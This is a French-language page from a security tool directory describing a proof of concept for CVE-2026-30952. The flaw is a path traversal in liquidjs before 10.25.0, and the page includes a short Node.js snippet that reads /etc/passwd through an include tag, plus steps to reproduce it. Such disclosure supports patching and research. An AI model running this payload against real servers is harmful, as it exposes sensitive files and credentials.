Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-30952-PoC — PoC pour CVE-2026-30952 : vulnérabilité de traversée de chemin dans liquidjs via des chemins absolus dans les balises layout, render et include. | Kitploit
Outils/GitHubGitHub/morielharush/cve-2026-30952-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité Web
GitHubmorielharush/cve-2026-30952-poc

CVE-2026-30952-PoC

PoC pour CVE-2026-30952 : vulnérabilité de traversée de chemin dans liquidjs via des chemins absolus dans les balises layout, render et include.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-30952 : Preuve de concept (PoC) de traversée de chemin dans LiquidJS

Ce dépôt contient une preuve de concept (PoC) pour CVE-2026-30952, une vulnérabilité de traversée de chemin de sévérité élevée découverte dans la bibliothèque liquidjs (versions < 10.25.0).

Auteurs et chercheurs :

Moriel Harush Maor Caplan

Description

La vulnérabilité permet un accès arbitraire aux fichiers via les balises layout, render et include lorsqu'elles sont utilisées avec des chemins absolus. Cela se produit même lorsqu'un répertoire root est spécifié, car le mécanisme de repli de la bibliothèque ne parvient pas à valider correctement que le chemin résolu reste dans le répertoire racine prévu.

Impact : Un attaquant peut lire des fichiers sensibles (par exemple, /etc/passwd, fichiers d'environnement) s'il peut contrôler le contenu du modèle ou la variable transmise à ces balises.


Détails de la vulnérabilité

  • Identifiant CVE : CVE-2026-30952
  • Identifiant GHSA : GHSA-wmfp-5q7x-987x
  • Sévérité : Élevée (8,7/10 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
  • Versions affectées : < 10.25.0
  • Version corrigée : 10.25.0

Preuve de concept (PoC)

root@kitploit:~
const { Liquid } = require('liquidjs');
const e = new Liquid({ root: ['/tmp'], partials: ['/tmp'], dynamicPartials: true });
e.parseAndRender('{% include page %}', { page: '../../../etc/passwd' }).then(o => console.log(o.slice(0,500)));
image

Prérequis

  • Node.js installé
  • Version vulnérable de liquidjs (npm install [email protected])

Étapes pour reproduire

  1. Clonez ce dépôt.
  2. Exécutez npm install.
  3. Exécutez le script d'exploitation :
    root@kitploit:~
    node exploit.js
    
Télécharger l’outil